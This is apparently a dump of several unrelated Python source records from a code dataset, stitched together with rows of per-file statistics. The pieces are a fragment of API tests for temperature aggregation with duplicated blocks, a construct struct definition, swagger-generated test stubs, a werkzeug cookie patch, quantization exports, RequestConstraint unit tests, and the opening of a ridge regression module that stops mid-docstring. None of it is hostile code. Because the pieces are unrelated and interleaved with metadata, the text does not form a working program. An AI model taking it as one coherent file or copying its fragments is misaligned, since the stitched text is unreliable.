assert r.status_code == 200, r.text
obtained = r.json()
assert isinstance(obtained, dict)
expected_temperatures = list(range(4))
expected_index = [
'',''
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': [sum(range(3))]
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types,
}
obtained = r.json()
assert obtained == expected
# Index array in the response is the used fromDate and toDate
query_params = {
'attrs': 'temperature',
'id': 'Room1',
'aggrMethod': 'max',
'fromDate': datetime(1970, 1, 1).isoformat(),
'toDate': datetime(1970, 1, 2).isoformat(),
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
obtained = r.json()
assert isinstance(obtained, dict)
expected_temperatures = list(range(2))
expected_index = [
'1970-01-{:02}T00:00:00'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': [1]
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types,
}
obtained = r.json()
assert obtained == expected
query_params = {
'attrs': 'temperature',
'id': 'Room1',
'aggrMethod': 'avg'
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
obtained = r.json()
assert isinstance(obtained, dict)
expected_temperatures = list(range(4))
expected_index = [
'',''
]
obtained = r.json()
assert isinstance(obtained, dict)
expected_temperatures = list(range(4))
expected_index = [
'',''
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': [1]
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types,
}
obtained = r.json()
assert obtained == expected
| 25.622642 | 98 | 0.555044 | 1,658 | 16,296 | 5.255127 | 0.106152 | 0.11018 | 0.077126 | 0.060599 | 0.800069 | 0.778607 | 0.760932 | 0.745782 | 0.725123 | 0.725123 | 0 | 0.052717 | 0.320201 | 16,296 | 635 | 99 | 25.662992 | 0.733797 | 0.036267 | 0 | 0.561818 | 0 | 0 | 0.141826 | 0.035888 | 0 | 0 | 0 | 0 | 0.076364 | 1 | 0.029091 | false | 0 | 0.009091 | 0 | 0.04 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2b19bd5667f59566f94bfa815f4cad9823f98d75 | 139 | py | Python | compiled/construct/zlib_with_header_78.py | smarek/ci_targets | c5edee7b0901fd8e7f75f85245ea4209b38e0cb3 | [
"MIT"
] | 4 | 2017-04-08T12:55:11.000Z | 2020-12-05T21:09:31.000Z | compiled/construct/zlib_with_header_78.py | smarek/ci_targets | c5edee7b0901fd8e7f75f85245ea4209b38e0cb3 | [
"MIT"
] | 7 | 2018-04-23T01:30:33.000Z | 2020-10-30T23:56:14.000Z | compiled/construct/zlib_with_header_78.py | smarek/ci_targets | c5edee7b0901fd8e7f75f85245ea4209b38e0cb3 | [
"MIT"
] | 6 | 2017-04-08T11:41:14.000Z | 2020-10-30T22:47:31.000Z | from construct import *
from construct.lib import *
zlib_with_header_78 = Struct(
'data' / GreedyBytes,
)
_schema = zlib_with_header_78
| 15.444444 | 29 | 0.769784 | 19 | 139 | 5.263158 | 0.631579 | 0.26 | 0.28 | 0.32 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033898 | 0.151079 | 139 | 8 | 30 | 17.375 | 0.813559 | 0 | 0 | 0 | 0 | 0 | 0.028777 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
9934002210430cadb6d5db7ff0b033d93a53c2ae | 1,138 | py | Python | test/test_all_of_instance_permission_set_response_byond_rights.py | ike709/tgs4-api-pyclient | 97918cfe614cc4ef06ef2485efff163417a8cd44 | [
"MIT"
] | null | null | null | test/test_all_of_instance_permission_set_response_byond_rights.py | ike709/tgs4-api-pyclient | 97918cfe614cc4ef06ef2485efff163417a8cd44 | [
"MIT"
] | null | null | null | test/test_all_of_instance_permission_set_response_byond_rights.py | ike709/tgs4-api-pyclient | 97918cfe614cc4ef06ef2485efff163417a8cd44 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
TGS API
A production scale tool for BYOND server management # noqa: E501
OpenAPI spec version: 9.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.all_of_instance_permission_set_response_byond_rights import AllOfInstancePermissionSetResponseByondRights # noqa: E501
from swagger_client.rest import ApiException
class TestAllOfInstancePermissionSetResponseByondRights(unittest.TestCase):
"""AllOfInstancePermissionSetResponseByondRights unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testAllOfInstancePermissionSetResponseByondRights(self):
"""Test AllOfInstancePermissionSetResponseByondRights"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.all_of_instance_permission_set_response_byond_rights.AllOfInstancePermissionSetResponseByondRights() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 28.45 | 154 | 0.77065 | 114 | 1,138 | 7.421053 | 0.596491 | 0.061466 | 0.040189 | 0.052009 | 0.1513 | 0.1513 | 0.1513 | 0.1513 | 0.1513 | 0.1513 | 0 | 0.013684 | 0.165202 | 1,138 | 39 | 155 | 29.179487 | 0.876842 | 0.458699 | 0 | 0.214286 | 1 | 0 | 0.013937 | 0 | 0 | 0 | 0 | 0.025641 | 0 | 1 | 0.214286 | false | 0.214286 | 0.357143 | 0 | 0.642857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
99a222dfd65ae2b87c29e4d51739d54a2668e16f | 211 | py | Python | backend/grant/patches.py | DSBUGAY2/zcash-grant-system | 729b9edda13bd1eeb3f445d889264230c6470d7e | [
"MIT"
] | 8 | 2019-06-03T16:29:49.000Z | 2021-05-11T20:38:36.000Z | backend/grant/patches.py | DSBUGAY2/zcash-grant-system | 729b9edda13bd1eeb3f445d889264230c6470d7e | [
"MIT"
] | 342 | 2019-01-15T19:13:58.000Z | 2020-03-24T16:38:13.000Z | backend/grant/patches.py | DSBUGAY2/zcash-grant-system | 729b9edda13bd1eeb3f445d889264230c6470d7e | [
"MIT"
] | 5 | 2019-02-15T09:06:47.000Z | 2022-01-24T21:38:41.000Z | from werkzeug import http, wrappers
from grant.werkzeug_http_fork import dump_cookie
def patch_werkzeug_set_samesite():
http.dump_cookie = dump_cookie
wrappers.base_response.dump_cookie = dump_cookie
| 23.444444 | 52 | 0.819905 | 30 | 211 | 5.4 | 0.5 | 0.308642 | 0.17284 | 0.246914 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132701 | 211 | 8 | 53 | 26.375 | 0.885246 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
51029f914659a3ab866b75e22b8fb9d023ded3d8 | 372 | py | Python | torch/ao/quantization/__init__.py | svecjan/pytorch | 09d221e8d439bc748b162c028f7eece202688adf | [
"Intel"
] | 3 | 2020-06-11T04:57:15.000Z | 2021-09-15T22:28:52.000Z | torch/ao/quantization/__init__.py | svecjan/pytorch | 09d221e8d439bc748b162c028f7eece202688adf | [
"Intel"
] | 1 | 2021-04-22T18:37:42.000Z | 2021-04-28T00:53:25.000Z | torch/ao/quantization/__init__.py | svecjan/pytorch | 09d221e8d439bc748b162c028f7eece202688adf | [
"Intel"
] | null | null | null | from .fake_quantize import * # noqa: F403
# TODO(future PR): fix the typo, should be `__all__`
_all__ = [
# FakeQuantize (for qat)
'default_fake_quant', 'default_weight_fake_quant',
'default_symmetric_fixed_qparams_fake_quant',
'default_affine_fixed_qparams_fake_quant',
'default_per_channel_weight_fake_quant',
'default_histogram_fake_quant',
]
| 31 | 54 | 0.755376 | 48 | 372 | 5.208333 | 0.583333 | 0.216 | 0.32 | 0.176 | 0.224 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009494 | 0.150538 | 372 | 11 | 55 | 33.818182 | 0.781646 | 0.225806 | 0 | 0 | 0 | 0 | 0.665493 | 0.602113 | 0 | 0 | 0 | 0.090909 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5ad986fc8d5cdda5aa2288bf1c0c2ec4e02308c1 | 142 | py | Python | jade2/deep_learning/torch/__init__.py | RosettaCommons/jade2 | 40affc7c4e0f1f6ee07030e72de284e3484946e7 | [
"BSD-3-Clause"
] | 1 | 2019-12-23T21:52:23.000Z | 2019-12-23T21:52:23.000Z | jade2/deep_learning/torch/__init__.py | RosettaCommons/jade2 | 40affc7c4e0f1f6ee07030e72de284e3484946e7 | [
"BSD-3-Clause"
] | null | null | null | jade2/deep_learning/torch/__init__.py | RosettaCommons/jade2 | 40affc7c4e0f1f6ee07030e72de284e3484946e7 | [
"BSD-3-Clause"
] | 1 | 2021-01-28T18:59:03.000Z | 2021-01-28T18:59:03.000Z | from .layers import *
from .modules import *
from .tensor_creation import *
from .training import *
from .util import *
from .metrics import * | 23.666667 | 30 | 0.753521 | 19 | 142 | 5.578947 | 0.473684 | 0.471698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161972 | 142 | 6 | 31 | 23.666667 | 0.890756 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
51c4bdf11005df47125b64ad2de25f2f362c84c2 | 45 | py | Python | tests/files/fail_3.py | NathanVaughn/pyleft | 3e2c0bbf84416afa4ed653a65f3fd37e589c7efa | [
"MIT"
] | null | null | null | tests/files/fail_3.py | NathanVaughn/pyleft | 3e2c0bbf84416afa4ed653a65f3fd37e589c7efa | [
"MIT"
] | 2 | 2021-12-09T00:20:21.000Z | 2022-01-01T23:26:17.000Z | tests/files/fail_3.py | NathanVaughn/pyleft | 3e2c0bbf84416afa4ed653a65f3fd37e589c7efa | [
"MIT"
] | null | null | null | class Car:
def drive(self):
pass
| 11.25 | 20 | 0.533333 | 6 | 45 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.377778 | 45 | 3 | 21 | 15 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.333333 | 0 | 0 | 0.666667 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
cfb2a0157f30834779e68730d5f0a41146770b7b | 11,175 | py | Python | awips/test/dafTests/testRequestConstraint.py | mjames-upc/python-awips | e2b05f5587b02761df3b6dd5c6ee1f196bd5f11c | [
"BSD-3-Clause"
] | null | null | null | awips/test/dafTests/testRequestConstraint.py | mjames-upc/python-awips | e2b05f5587b02761df3b6dd5c6ee1f196bd5f11c | [
"BSD-3-Clause"
] | null | null | null | awips/test/dafTests/testRequestConstraint.py | mjames-upc/python-awips | e2b05f5587b02761df3b6dd5c6ee1f196bd5f11c | [
"BSD-3-Clause"
] | null | null | null | from dynamicserialize.dstypes.com.raytheon.uf.common.dataquery.requests import RequestConstraint
import unittest
#
# Unit tests for Python implementation of RequestConstraint
#
# SOFTWARE HISTORY
#
# Date Ticket# Engineer Description
# ------------ ---------- ----------- --------------------------
# 07/22/16 2416 tgurney Initial creation
#
#
class RequestConstraintTestCase(unittest.TestCase):
def _newRequestConstraint(self, constraintType, constraintValue):
constraint = RequestConstraint()
constraint.constraintType = constraintType
constraint.constraintValue = constraintValue
return constraint
def testEvaluateEquals(self):
new = RequestConstraint.new
self.assertTrue(new('=', 3).evaluate(3))
self.assertTrue(new('=', 3).evaluate('3'))
self.assertTrue(new('=', '3').evaluate(3))
self.assertTrue(new('=', 12345).evaluate(12345))
self.assertTrue(new('=', 'a').evaluate('a'))
self.assertTrue(new('=', 'a').evaluate(u'a'))
self.assertTrue(new('=', 1.0001).evaluate(2.0 - 0.999999))
self.assertTrue(new('=', 1.00001).evaluate(1))
self.assertFalse(new('=', 'a').evaluate(['a']))
self.assertFalse(new('=', 'a').evaluate(['b']))
self.assertFalse(new('=', 3).evaluate(4))
self.assertFalse(new('=', 4).evaluate(3))
self.assertFalse(new('=', 'a').evaluate('z'))
def testEvaluateNotEquals(self):
new = RequestConstraint.new
self.assertTrue(new('!=', 'a').evaluate(['a']))
self.assertTrue(new('!=', 'a').evaluate(['b']))
self.assertTrue(new('!=', 3).evaluate(4))
self.assertTrue(new('!=', 4).evaluate(3))
self.assertTrue(new('!=', 'a').evaluate('z'))
self.assertFalse(new('!=', 3).evaluate('3'))
self.assertFalse(new('!=', '3').evaluate(3))
self.assertFalse(new('!=', 3).evaluate(3))
self.assertFalse(new('!=', 12345).evaluate(12345))
self.assertFalse(new('!=', 'a').evaluate('a'))
self.assertFalse(new('!=', 'a').evaluate(u'a'))
self.assertFalse(new('!=', 1.0001).evaluate(2.0 - 0.9999))
def testEvaluateGreaterThan(self):
new = RequestConstraint.new
self.assertTrue(new('>', 1.0001).evaluate(1.0002))
self.assertTrue(new('>', 'a').evaluate('b'))
self.assertTrue(new('>', 3).evaluate(4))
self.assertFalse(new('>', 20).evaluate(3))
self.assertFalse(new('>', 12345).evaluate(12345))
self.assertFalse(new('>', 'a').evaluate('a'))
self.assertFalse(new('>', 'z').evaluate('a'))
self.assertFalse(new('>', 4).evaluate(3))
def testEvaluateGreaterThanEquals(self):
new = RequestConstraint.new
self.assertTrue(new('>=', 3).evaluate(3))
self.assertTrue(new('>=', 12345).evaluate(12345))
self.assertTrue(new('>=', 'a').evaluate('a'))
self.assertTrue(new('>=', 1.0001).evaluate(1.0002))
self.assertTrue(new('>=', 'a').evaluate('b'))
self.assertTrue(new('>=', 3).evaluate(20))
self.assertFalse(new('>=', 1.0001).evaluate(1.0))
self.assertFalse(new('>=', 'z').evaluate('a'))
self.assertFalse(new('>=', 40).evaluate(3))
def testEvaluateLessThan(self):
new = RequestConstraint.new
self.assertTrue(new('<', 'z').evaluate('a'))
self.assertTrue(new('<', 30).evaluate(4))
self.assertFalse(new('<', 3).evaluate(3))
self.assertFalse(new('<', 12345).evaluate(12345))
self.assertFalse(new('<', 'a').evaluate('a'))
self.assertFalse(new('<', 1.0001).evaluate(1.0002))
self.assertFalse(new('<', 'a').evaluate('b'))
self.assertFalse(new('<', 3).evaluate(40))
def testEvaluateLessThanEquals(self):
new = RequestConstraint.new
self.assertTrue(new('<=', 'z').evaluate('a'))
self.assertTrue(new('<=', 20).evaluate(3))
self.assertTrue(new('<=', 3).evaluate(3))
self.assertTrue(new('<=', 12345).evaluate(12345))
self.assertTrue(new('<=', 'a').evaluate('a'))
self.assertFalse(new('<=', 1.0001).evaluate(1.0002))
self.assertFalse(new('<=', 'a').evaluate('b'))
self.assertFalse(new('<=', 4).evaluate(30))
def testEvaluateIsNull(self):
new = RequestConstraint.new
self.assertTrue(new('=', None).evaluate(None))
self.assertTrue(new('=', None).evaluate('null'))
self.assertFalse(new('=', None).evaluate(()))
self.assertFalse(new('=', None).evaluate(0))
self.assertFalse(new('=', None).evaluate(False))
def testEvaluateIsNotNull(self):
new = RequestConstraint.new
self.assertTrue(new('!=', None).evaluate(()))
self.assertTrue(new('!=', None).evaluate(0))
self.assertTrue(new('!=', None).evaluate(False))
self.assertFalse(new('!=', None).evaluate(None))
self.assertFalse(new('!=', None).evaluate('null'))
def testEvaluateIn(self):
new = RequestConstraint.new
self.assertTrue(new('in', [3]).evaluate(3))
self.assertTrue(new('in', ['a', 'b', 3]).evaluate(3))
self.assertTrue(new('in', 'a').evaluate('a'))
self.assertTrue(new('in', [3, 4, 5]).evaluate('5'))
self.assertTrue(new('in', [1.0001, 2, 3]).evaluate(2.0 - 0.9999))
self.assertFalse(new('in', ['a', 'b', 'c']).evaluate('d'))
self.assertFalse(new('in', 'a').evaluate('b'))
def testEvaluateNotIn(self):
new = RequestConstraint.new
self.assertTrue(new('not in', ['a', 'b', 'c']).evaluate('d'))
self.assertTrue(new('not in', [3, 4, 5]).evaluate(6))
self.assertTrue(new('not in', 'a').evaluate('b'))
self.assertFalse(new('not in', [3]).evaluate(3))
self.assertFalse(new('not in', ['a', 'b', 3]).evaluate(3))
self.assertFalse(new('not in', 'a').evaluate('a'))
self.assertFalse(new('not in', [1.0001, 2, 3]).evaluate(2.0 - 0.9999))
def testEvaluateLike(self):
# cannot make "like" with RequestConstraint.new()
new = self._newRequestConstraint
self.assertTrue(new('LIKE', 'a').evaluate('a'))
self.assertTrue(new('LIKE', 'a%').evaluate('a'))
self.assertTrue(new('LIKE', 'a%').evaluate('abcd'))
self.assertTrue(new('LIKE', '%a').evaluate('a'))
self.assertTrue(new('LIKE', '%a').evaluate('bcda'))
self.assertTrue(new('LIKE', '%').evaluate(''))
self.assertTrue(new('LIKE', '%').evaluate('anything'))
self.assertTrue(new('LIKE', 'a%d').evaluate('ad'))
self.assertTrue(new('LIKE', 'a%d').evaluate('abcd'))
self.assertTrue(new('LIKE', 'aa.()!{[]^%$').evaluate('aa.()!{[]^zzz$'))
self.assertTrue(new('LIKE', 'a__d%').evaluate('abcdefg'))
self.assertFalse(new('LIKE', 'a%').evaluate('b'))
self.assertFalse(new('LIKE', 'a%').evaluate('ba'))
self.assertFalse(new('LIKE', '%a').evaluate('b'))
self.assertFalse(new('LIKE', '%a').evaluate('ab'))
self.assertFalse(new('LIKE', 'a%').evaluate('A'))
self.assertFalse(new('LIKE', 'A%').evaluate('a'))
self.assertFalse(new('LIKE', 'a%d').evaluate('da'))
self.assertFalse(new('LIKE', 'a__d%').evaluate('abccdefg'))
self.assertFalse(new('LIKE', '....').evaluate('aaaa'))
self.assertFalse(new('LIKE', '.*').evaluate('anything'))
def testEvaluateILike(self):
# cannot make "ilike" with RequestConstraint.new()
new = self._newRequestConstraint
self.assertTrue(new('ILIKE', 'a').evaluate('a'))
self.assertTrue(new('ILIKE', 'a%').evaluate('a'))
self.assertTrue(new('ILIKE', 'a%').evaluate('abcd'))
self.assertTrue(new('ILIKE', '%a').evaluate('a'))
self.assertTrue(new('ILIKE', '%a').evaluate('bcda'))
self.assertTrue(new('ILIKE', '%').evaluate(''))
self.assertTrue(new('ILIKE', '%').evaluate('anything'))
self.assertTrue(new('ILIKE', 'a%d').evaluate('ad'))
self.assertTrue(new('ILIKE', 'a%d').evaluate('abcd'))
self.assertTrue(new('ILIKE', 'a').evaluate('A'))
self.assertTrue(new('ILIKE', 'a%').evaluate('A'))
self.assertTrue(new('ILIKE', 'a%').evaluate('ABCD'))
self.assertTrue(new('ILIKE', '%a').evaluate('A'))
self.assertTrue(new('ILIKE', '%a').evaluate('BCDA'))
self.assertTrue(new('ILIKE', '%').evaluate(''))
self.assertTrue(new('ILIKE', '%').evaluate('anything'))
self.assertTrue(new('ILIKE', 'a%d').evaluate('AD'))
self.assertTrue(new('ILIKE', 'a%d').evaluate('ABCD'))
self.assertTrue(new('ILIKE', 'A').evaluate('a'))
self.assertTrue(new('ILIKE', 'A%').evaluate('a'))
self.assertTrue(new('ILIKE', 'A%').evaluate('abcd'))
self.assertTrue(new('ILIKE', '%A').evaluate('a'))
self.assertTrue(new('ILIKE', '%A').evaluate('bcda'))
self.assertTrue(new('ILIKE', '%').evaluate(''))
self.assertTrue(new('ILIKE', '%').evaluate('anything'))
self.assertTrue(new('ILIKE', 'A%D').evaluate('ad'))
self.assertTrue(new('ILIKE', 'A%D').evaluate('abcd'))
self.assertTrue(new('ILIKE', 'aa.()!{[]^%$').evaluate('AA.()!{[]^zzz$'))
self.assertTrue(new('ILIKE', 'a__d%').evaluate('abcdefg'))
self.assertTrue(new('ILIKE', 'a__d%').evaluate('ABCDEFG'))
self.assertFalse(new('ILIKE', 'a%').evaluate('b'))
self.assertFalse(new('ILIKE', 'a%').evaluate('ba'))
self.assertFalse(new('ILIKE', '%a').evaluate('b'))
self.assertFalse(new('ILIKE', '%a').evaluate('ab'))
self.assertFalse(new('ILIKE', 'a%d').evaluate('da'))
self.assertFalse(new('ILIKE', 'a__d%').evaluate('abccdefg'))
self.assertFalse(new('ILIKE', '....').evaluate('aaaa'))
self.assertFalse(new('ILIKE', '.*').evaluate('anything'))
def testEvaluateBetween(self):
# cannot make "between" with RequestConstraint.new()
new = self._newRequestConstraint
self.assertTrue(new('BETWEEN', '1--1').evaluate(1))
self.assertTrue(new('BETWEEN', '1--10').evaluate(1))
self.assertTrue(new('BETWEEN', '1--10').evaluate(5))
self.assertTrue(new('BETWEEN', '1--10').evaluate(10))
self.assertTrue(new('BETWEEN', '1.0--1.1').evaluate(1.0))
self.assertTrue(new('BETWEEN', '1.0--1.1').evaluate(1.05))
self.assertTrue(new('BETWEEN', '1.0--1.1').evaluate(1.1))
self.assertTrue(new('BETWEEN', 'a--x').evaluate('a'))
self.assertTrue(new('BETWEEN', 'a--x').evaluate('j'))
self.assertTrue(new('BETWEEN', 'a--x').evaluate('x'))
self.assertFalse(new('BETWEEN', '1--1').evaluate(2))
self.assertFalse(new('BETWEEN', '1--2').evaluate(10))
self.assertFalse(new('BETWEEN', '1--10').evaluate(0))
self.assertFalse(new('BETWEEN', '1--10').evaluate(11))
self.assertFalse(new('BETWEEN', '1.0--1.1').evaluate(0.99))
self.assertFalse(new('BETWEEN', '1.0--1.1').evaluate(1.11))
self.assertFalse(new('BETWEEN', 'a--x').evaluate(' '))
self.assertFalse(new('BETWEEN', 'a--x').evaluate('z'))
| 49.446903 | 96 | 0.575749 | 1,276 | 11,175 | 5.031348 | 0.085423 | 0.202804 | 0.246262 | 0.102804 | 0.85405 | 0.75109 | 0.723832 | 0.582243 | 0.572741 | 0.470561 | 0 | 0.034241 | 0.184609 | 11,175 | 225 | 97 | 49.666667 | 0.670325 | 0.038031 | 0 | 0.098446 | 0 | 0 | 0.102385 | 0 | 0 | 0 | 0 | 0 | 0.823834 | 1 | 0.072539 | false | 0 | 0.010363 | 0 | 0.093264 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5c73cc7a01f174eb64abd1ee0a0082418ae379cc | 177 | py | Python | hci/event/events/__init__.py | svdpuranik/python-hci | 4920f9555d32704ea918f7ae5d705b18e78281e5 | [
"MIT"
] | 16 | 2017-11-28T18:06:40.000Z | 2022-02-11T09:19:40.000Z | hci/event/events/__init__.py | svdpuranik/python-hci | 4920f9555d32704ea918f7ae5d705b18e78281e5 | [
"MIT"
] | 3 | 2017-12-19T11:19:55.000Z | 2018-01-04T18:32:44.000Z | hci/event/events/__init__.py | svdpuranik/python-hci | 4920f9555d32704ea918f7ae5d705b18e78281e5 | [
"MIT"
] | 9 | 2017-12-18T19:39:10.000Z | 2022-01-25T01:43:03.000Z | from .vendor_specific_event import VendorSpecificEvent
from .hci_command_complete import HCI_CommandComplete
from .vendor_specific import *
from .hci_commands_complete import *
| 35.4 | 54 | 0.875706 | 22 | 177 | 6.681818 | 0.5 | 0.136054 | 0.244898 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090395 | 177 | 4 | 55 | 44.25 | 0.913043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5cd5faa2f1657a44298d0ffb37363aed13343667 | 32,258 | py | Python | supplemental_files/strf/ridge.py | HamiltonLabUT/lab_intro_notebooks | be6e8988307b0fe6ccbca3b4052b14022d3b6de6 | [
"BSD-3-Clause"
] | null | null | null | supplemental_files/strf/ridge.py | HamiltonLabUT/lab_intro_notebooks | be6e8988307b0fe6ccbca3b4052b14022d3b6de6 | [
"BSD-3-Clause"
] | null | null | null | supplemental_files/strf/ridge.py | HamiltonLabUT/lab_intro_notebooks | be6e8988307b0fe6ccbca3b4052b14022d3b6de6 | [
"BSD-3-Clause"
] | null | null | null | #import scipy
import numpy as np
import logging
from supplemental_files.strf.utils import mult_diag, counter
import random
import itertools as itools
zs = lambda v: (v-v.mean(0))/v.std(0) ## z-score function
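# A minimal, self-contained sketch (demo only, not part of the module API; the
# function name is illustrative) of what the zs helper above computes: each
# column is centered and scaled to unit standard deviation.
def _demo_zs():
    import numpy as np
    v = np.arange(12.0).reshape(6, 2)
    z = (v - v.mean(0)) / v.std(0)  # same column-wise z-score as zs above
    return bool(np.allclose(z.mean(0), 0.0) and np.allclose(z.std(0), 1.0))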
ridge_logger = logging.getLogger("ridge_corr")
def ridge(stim, resp, alpha, singcutoff=1e-10, normalpha=False, logger=ridge_logger):
"""Uses ridge regression to find a linear transformation of [stim] that approximates
[resp]. The regularization parameter is [alpha].
Parameters
----------
stim : array_like, shape (T, N)
Stimuli with T time points and N features.
resp : array_like, shape (T, M)
Responses with T time points and M separate responses.
alpha : float or array_like, shape (M,)
Regularization parameter. Can be given as a single value (which is applied to
all M responses) or separate values for each response.
    normalpha : boolean
        Whether ridge parameters should be normalized by the largest singular value of stim. Good for
        comparing models with different numbers of parameters.
    singcutoff : float
        Unused in this function; accepted for call-signature compatibility with ridge_corr.
Returns
-------
wt : array_like, shape (N, M)
Linear regression weights.
"""
try:
U,S,Vh = np.linalg.svd(stim, full_matrices=False)
except np.linalg.LinAlgError:
logger.info("NORMAL SVD FAILED, trying more robust dgesvd..")
from text.regression.svd_dgesvd import svd_dgesvd
U,S,Vh = svd_dgesvd(stim, full_matrices=False)
UR = np.dot(U.T, np.nan_to_num(resp))
# Expand alpha to a collection if it's just a single value
    if isinstance(alpha, (int, float)):
alpha = np.ones(resp.shape[1]) * alpha
# Normalize alpha by the LSV norm
norm = S[0]
if normalpha:
nalphas = alpha * norm
else:
nalphas = alpha
# Compute weights for each alpha
ualphas = np.unique(nalphas)
wt = np.zeros((stim.shape[1], resp.shape[1]))
for ua in ualphas:
selvox = np.nonzero(nalphas==ua)[0]
awt = np.dot(Vh.T, np.dot(np.diag(S/(S**2+ua**2)), UR[:,selvox]))
wt[:,selvox] = awt
return wt
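# A hedged sanity check (demo only; not part of the original API) that the SVD
# route used in ridge() is algebraically the closed-form solution
# (X^T X + alpha**2 I)^{-1} X^T y -- note the alpha is squared, via S**2 + ua**2.
def _demo_ridge_svd_equivalence():
    import numpy as np
    rng = np.random.RandomState(0)
    X = rng.randn(50, 10)
    y = rng.randn(50, 3)
    a = 2.0
    # SVD route, as in ridge(): Vh.T @ diag(S / (S**2 + a**2)) @ U.T @ y
    U, S, Vh = np.linalg.svd(X, full_matrices=False)
    wt_svd = np.dot(Vh.T, np.dot(np.diag(S / (S**2 + a**2)), np.dot(U.T, y)))
    # Direct closed form with the squared penalty
    wt_closed = np.linalg.solve(np.dot(X.T, X) + a**2 * np.eye(10), np.dot(X.T, y))
    return bool(np.allclose(wt_svd, wt_closed))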
def eigridge(stim, resp, alpha, singcutoff=1e-10, normalpha=False, force_cmode=None, covmat=None, Q=None, L=None, logger=ridge_logger):
"""Uses ridge regression with eigenvalue decomposition to find a linear transformation of
[stim] that approximates [resp]. The regularization parameter is [alpha].
Parameters
----------
stim : array_like, shape (T, N)
Stimuli with T time points and N features.
